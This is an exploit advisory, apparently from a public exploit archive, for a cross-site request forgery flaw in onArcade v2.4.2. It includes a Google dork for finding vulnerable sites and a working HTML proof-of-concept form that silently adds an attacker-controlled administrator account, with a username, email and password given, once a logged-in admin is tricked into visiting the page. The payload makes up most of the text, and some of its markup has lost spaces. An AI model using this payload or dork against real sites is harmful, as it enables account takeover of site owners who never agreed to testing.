# Exploit Title: Cross-Site Request Forgery (Add Admin)# Google Dork: Powered by onArcade v2.4.2# Date: 2018/August/4# Author: r3m0t3nu11[Zero-way]# Software Link: ["http://www.onarcade.com"]# Version: ["Uptodate"]
the appilication is vulnerable to CSRF attack (No CSRF token in place) meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering).[P0C]#<html><body><script>history.pushState('','','/')</script><form action="https://server/path/admin/members.php?a=add_member&ajax=1"method="POST"><inputtype="hidden" name="username" value="r3m0t3nu11"/><inputtype="hidden" name="email" value="l0v3rs14@gmail.com"/><inputtype="hidden" name="password" value="123123"/><inputtype="hidden" name="user_group" value="2"/><inputtype="submit" value="Submit request"/></form></body></html>